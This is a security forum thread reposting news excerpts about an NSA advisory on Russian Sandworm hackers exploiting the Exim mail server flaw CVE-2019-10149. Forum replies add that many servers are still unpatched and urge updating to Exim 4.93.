NSA warns of new Sandworm attacks on email servers

[correlate]

[correlate]

Level 18
Thread author
Verified
Top Poster
Well-known
Forum Veteran
May 4, 2019
803
9,648
1,670
New York
Content source
https://www.zdnet.com/article/nsa-warns-of-new-sandworm-attacks-on-email-servers/
The U.S. National Security Agency (NSA) says that Russian military threat actors known as Sandworm Team have been exploiting a critical flaw in the Exim mail transfer agent (MTA) software since at least August 2019.

The vulnerability tracked as CVE-2019-10149 and named "The Return of the WIZard" makes it possible for unauthenticated remote attackers to execute arbitrary commands as root on vulnerable mail servers — for some non-default server configurations — after sending a specially crafted email.
"When the patch was released last year, Exim urged its users to update to the latest version," the agency says. "NSA adds its encouragement to immediately patch to mitigate against this still current threat."
Click to expand...
www.zdnet.com

NSA warns of new Sandworm attacks on email servers

NSA says Russia's military hackers have been attacking Exim email servers to plant backdoors since August 2019.
www.zdnet.com www.zdnet.com
www.bleepingcomputer.com

NSA: Russian govt hackers exploiting critical Exim flaw since 2019

The U.S. National Security Agency (NSA) says that Russian military threat actors tracked as Sandworm Team have been exploiting a critical flaw in the Exim mail transfer agent (MTA) software since at least August 2019.
www.bleepingcomputer.com www.bleepingcomputer.com
 
  • Like
  • +Reputation
Reactions: Mercenary, silversurfer, bayasdev and 4 others
www.bleepingcomputer.com

Critical Exim bugs being patched but many servers still at risk

Patching Exim mail servers is not going fast enough and members of the Russian hacker group Sandworm are actively exploiting three critical vulnerabilities that allow executing remote command or code remotely.
www.bleepingcomputer.com www.bleepingcomputer.com
Patching Exim mail servers is not going fast enough and members of the Russian hacker group Sandworm are actively exploiting three critical vulnerabilities that allow executing remote command or code remotely.

Close to a million Exim servers are currently exposed and vulnerable, although the number is gradually getting lower every day. Exim 4.93 is currently considered a safe release.
Click to expand...
 
  • Like
  • +Reputation
  • Applause
Reactions: harlan4096, [correlate], upnorth and 1 other person
You must log in or register to reply here.

You may also like...